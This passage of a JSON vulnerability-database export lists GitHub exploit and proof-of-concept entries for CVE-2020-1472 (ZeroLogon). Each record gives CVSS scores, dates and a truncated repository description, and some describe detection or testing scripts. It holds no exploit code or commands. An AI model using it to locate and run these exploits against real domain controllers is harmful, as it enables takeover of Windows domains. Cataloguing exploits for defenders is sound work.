"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-24T20:08:43", "id": "879CF3A7-ECBC-552A-A044-5E2724F63279", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:29:48", "description": "# Windows NetLogon \u6743\u9650\u63d0\u5347\u6f0f\u6d1e\u590d\u73b0\uff08CVE-2020-1472\uff09\n\n\u9700\u5c06impacket.z...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-26T08:31:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-09-01T09:13:51", "id": "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:31:50", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-21T07:24:03", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T07:24:16", "id": "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:37:26", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-19T23:15:41", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T23:15:54", "id": "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:32:45", "description": "# CVE-2020-1472-Easy\nThis is definitely not something you would ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-19T20:44:40", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T21:27:41", "id": "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-07T07:28:43", "description": "# Zer0Dump\n\nZer0dump is an PoC exploit/tool for abusing the vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T19:27:14", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-07-06T23:37:31", "id": "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:36", "description": "<b>[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T09:22:30", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-10-24T06:02:52", "id": "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:37", "description": "# CVE-2020-1472 - Zero-Logon POC\n\n![alt text](https://github.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T14:29:24", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-27T07:28:51", "id": "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:34:15", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T09:54:09", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-10T11:45:35", "id": "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:38", "description": "## Introduction article\nhttps://www.yuque.com/shamo-vs4ia/vul/kt...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T08:32:52", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-28T04:59:11", "id": "9C9BD402-511C-597D-9864-647131FE6647", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:39:46", "description": "# zerologon\nCheck for events that indicate non compatible device...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-15T15:02:53", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-11T09:28:46", "id": "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:41:26", "description": "#\n# CVE-2020-1472 Event Reader v1.1 8/27/2020\n# This script will...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-05T15:17:14", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-05T15:19:05", "id": "5E80DB20-575C-537A-9B83-CCFCCB55E448", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:34:14", "description": "# CVE-2020-1472\n CVE-2020-1472\u590d\u73b0\u65f6\u4f7f\u7528...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-18T00:02:26", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-07-01T15:20:47", "id": "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:46:09", "description": "NOTICE: I have yet to build out this repo and it's respective sc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-10T22:29:56", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-12-04T21:08:46", "id": "939F3BE7-AF69-5351-BD56-12412FA184C5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:32", "description": "# ZeroLogon testing script\r\n\r\nA Python script that uses the Impa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T14:25:54", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T17:56:06", "id": "63C36F7A-5F99-5A79-B99F-260360AC237F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-23T12:58:37", "description": "Script to automate Checks for potential exploitation of CVE-2020...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-01-07T21:35:16", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-07-23T07:58:15", "id": "07DF268C-467E-54A3-B713-057BA19C72F7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:57:02", "description": "# zerologon\nzerologon script to exploit CVE-2020-1472 CVSS 10/10...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-01-01T07:38:58", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-17T15:08:53", "id": "3F400483-1F7E-5BE5-8612-4D55D450D553", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:05:57", "description": "# ZeroLogon - Exploit and Example\nModified the test PoC from [Se...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-03-01T04:21:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-12-29T12:28:45", "id": "BBE1926E-1EC7-5657-8766-3CA8418F815C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:34:06", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-16T17:24:25", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-16T17:38:51", "id": "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-14T10:06:13", "description": "# Zerologon test for SMB & RPC\nA python script based on [SecuraB...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-17T16:53:17", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-06-14T09:34:19", "id": "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:09:34", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", 